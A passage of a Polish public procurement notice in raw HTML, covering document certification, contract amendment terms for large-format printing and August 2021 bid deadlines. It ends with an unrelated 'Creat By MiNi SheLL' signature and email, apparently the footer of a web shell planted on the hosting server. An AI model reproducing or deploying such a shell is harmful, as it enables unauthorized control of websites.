zgodność<br/>cyfrowego odwzorowania z dokumentem w postaci papierowej.<br/>22. Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej, o<br/>którym mowa w pkt 21, dokonuje w przypadku:<br/>1) Podmiotowych środków dowodowych - odpowiednio Wykonawca, Wykonawca wspólnie<br/>ubiegający się o udzielenie zamówienia, podmiot udostępniający zasoby lub Podwykonawca, w<br/>zakresie podmiotowych środków dowodowych, które każdego z nich dotyczą;<br/>2) Przedmiotowego środka dowodowego, oświadczenia, o którym mowa w art. 117 ust. 4 ustawy<br/>Pzp, lub zobowiązania podmiotu udostępniającego zasoby - odpowiednio Wykonawca lub<br/>Wykonawca wspólnie ubiegający się o udzielenie zamówienia;<br/>3) Pełnomocnictwa – mocodawca;<br/>Pozostałe informacje w SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. W zakresie zmian Umowy na warunkach przewidzianych w ustawie Pzp Strony uprawnione<br/>są w szczególności do:<br/>A. wprowadzania zmian nieistotnych rozumianych jako inne niż zmiany zdefiniowane w art. 454<br/>ust. 2 ustawy Pzp;<br/>B. wprowadzania, stosownie do treści art. 455 ust. 1 pkt 1 ustawy Ppz, zmian na zasadach i w<br/>zakresie określonym poniżej:<br/>1) wystąpienia konieczności zmiany terminu realizacji Przedmiotu Umowy, ze względu na:<br/>a) przerwanie realizacji świadczenia usługi z przyczyn niezawinionych przez Strony Umowy,<br/>wówczas Strony Umowy doliczą okres przerwy do terminu realizacji etap –u/-ów Umowy, w<br/>szczególności jeśli przerwa jest następstwem sytuacji finansowej wynikającej z okoliczności<br/>spowodowanych wystąpieniem przerwy,<br/>b) wystąpienie siły wyższej uniemożliwiającej wykonanie Przedmiotu Umowy (np. klęski<br/>żywiołowe, strajk generalny lub lokalny itp. Za siłę wyższą Strony uznają także wystąpienie<br/>okoliczności, o których mowa w pkt 6), 7) wówczas Strony Umowy doliczą okres przez który<br/>wykonanie Umowy nie było możliwe do terminu realizacji Umowy, o ile zmiana terminu<br/>wykonania zamówienia nie wpływa na zmianę wynagrodzenia Wykonawcy.<br/>2) zmian organizacyjnych i funkcjonalnych wynikających z decyzji odpowiednich organów, na<br/>podstawie których nastąpi cesja praw i obowiązków na nowo utworzony podmiot.<br/>3) zmiany regulacji prawnych dotyczących przedmiotu Umowy w stosunku do przepisów<br/>obowiązujących w dniu podpisania Umowy;<br/>4) zmiany stawki podatku od towarów i usług na usługi stanowiące przedmiot zamówienia.<br/>Wynagrodzenie brutto określone w umowie ulegnie wówczas odpowiedniej zmianie, w taki<br/>sposób, aby wynikające z umowy wynagrodzenie netto pozostało niezmienione;<br/>5) konieczność realizacji zamówienia dodatkowego, niezbędnego dla prawidłowej realizacji<br/>Przedmiotu Umowy, a którego realizacji nie można było przewidzieć na etapie składania oferty,<br/>wówczas termin realizacji zamówienia określony w Umowie pierwotnej zostanie zmieniony o<br/>okres przewidziany na realizację i odbiór zamówienia dodatkowego określonego w umowie o<br/>udzielenie zamówienia dodatkowego;<br/>6) wprowadzeniem na obszarze Rzeczypospolitej Polskiej lub województwa małopolskiego<br/>stanu nadzwyczajnego, stanu zagrożenia epidemicznego, stanu epidemii – zmianie ulec może<br/>termin wykonania Umowy, zakres i sposób wykonania Umowy, a także wysokość<br/>wynagrodzenia Wykonawcy – zakres zmian i zasady ich wprowadzenia uwzględniać będą<br/>obowiązujące w tym zakresie przepisy prawa lub aktów wykonawczych wydanych przez<br/>odpowiednie organy administracji państwowej;<br/>7) gdy z uwagi na zapobieganie lub minimalizowanie negatywnych skutków finansowego<br/>oddziaływania stanu epidemii lub innego stanu związanego z wystąpieniem zakażenia<br/>spowodowanego wirusem COVID- 19 zajdzie konieczność optymalizacji finansowej zakresu<br/>rzeczowego Przedmiotu Umowy, zajdzie konieczność odwołania lub rezygnacji z wydarzeń, z<br/>którymi realizacja Umowy się wiązała.<br/>8) nastąpi odstąpienie przez Zamawiającego bądź przez podmioty z nim współpracujące od<br/>całości lub części realizacji projektu wystawy / imprezy / wydarzenia kulturalnego, dla potrzeb<br/>której wydruki wielkoformatowe objęte Umową miały być drukowane. W tym przypadku,<br/>wynagrodzenie brutto, o którym mowa w § 3 ust. 2 Umowy, ulegnie odpowiedniej zmianie w<br/>zakresie określonym w § 3 ust. 4 Umowy;<br/>9) nastąpi zmiana terminów zamówień na poszczególne wydruki wielkoformatowe z powodu<br/>okoliczności niezawinionych, niezależnych od Wykonawcy wynikających z działania podmiotów<br/>trzecich lub niedostępności materiałów niezbędnych do druku. Nowe terminy zamówień do druku<br/>będą uzgadniane z Zamawiającym na bieżąco;<br/>10) nastąpi zwiększenie nakładów poszczególnych wydruków wielkoformatowych określonych w<br/>danej pozycji Opisu przedmiotu zamówienia – Formularzu cenowym. Zmiana ilości<br/>poszczególnych pozycji nie może w konsekwencji przekroczyć maksymalnego wynagrodzenia, o<br/>którym mowa w § 3 ust. 2 Umowy.<br/>11) okoliczności wskazanych w art. 455 ust. 2 ustawy Pzp;<br/>Pozostałe informacje w SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-24 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-24 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-22</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com